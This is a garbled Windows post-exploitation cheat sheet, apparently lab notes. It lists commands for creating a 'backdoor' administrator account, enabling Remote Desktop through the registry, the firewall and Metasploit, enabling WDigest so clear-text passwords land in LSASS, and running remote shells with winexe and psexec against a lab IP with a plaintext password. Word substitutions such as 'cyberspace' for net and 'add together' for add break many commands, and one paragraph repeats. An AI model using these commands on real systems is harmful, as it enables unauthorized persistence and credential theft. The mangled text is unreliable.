Backdoor User
net user backdoor backdoor123 /add cyberspace localgroup administrators backdoor /add cyberspace localgroup "Remote Desktop Users" backdoor /add
Enabling RDP
netsh firewall laid upward service RemoteDesktop enable
reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add together "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= car cyberspace outset Termservice netsh.exe firewall add together portopening TCP 3389 "Remote Desktop"OR:
netsh.exe advfirewall firewall add together dominion name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound dominion for the Remote Desktop service to let RDP traffic. [TCP 3389] added past times LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add together dominion name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound dominion for the Remote Desktop service to let RDP traffic. [UDP 3389] added past times LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=udpOR (meterpreter)
run post/windows/manage/enable_rdphttps://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
Dumping Credentials
https://adsecurity.org/?page_id=1821
inwards club to forestall the “clear-text” password from existence placed inwards LSASS, the next registry telephone commutation needs to survive laid upward to “0” (Digest Disabled):
inwards club to forestall the “clear-text” password from existence placed inwards LSASS, the next registry telephone commutation needs to survive laid upward to “0” (Digest Disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)This registry telephone commutation is worth monitoring inwards your environs since an aggressor may want to laid upward it to 1 to enable Digest password back upward which forces “clear-text” passwords to survive placed inwards LSASS on whatever version of Windows from Windows 7/2008R2 upward to Windows 10/2012R2. Windows 8.1/2012 R2 together with newer create non accept a “UseLogonCredential” DWORD value, together with hence it would accept to survive created. The existence of this telephone commutation on these systems may cry for a problem.
Remote Commands
winexe --user=backdoor%laKK195@19z //10.11.1.218 ipconfig
winexe --user=backdoor%laKK195@19z --system //10.11.1.218 cmdOR
psexec (from Windows)OR
nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>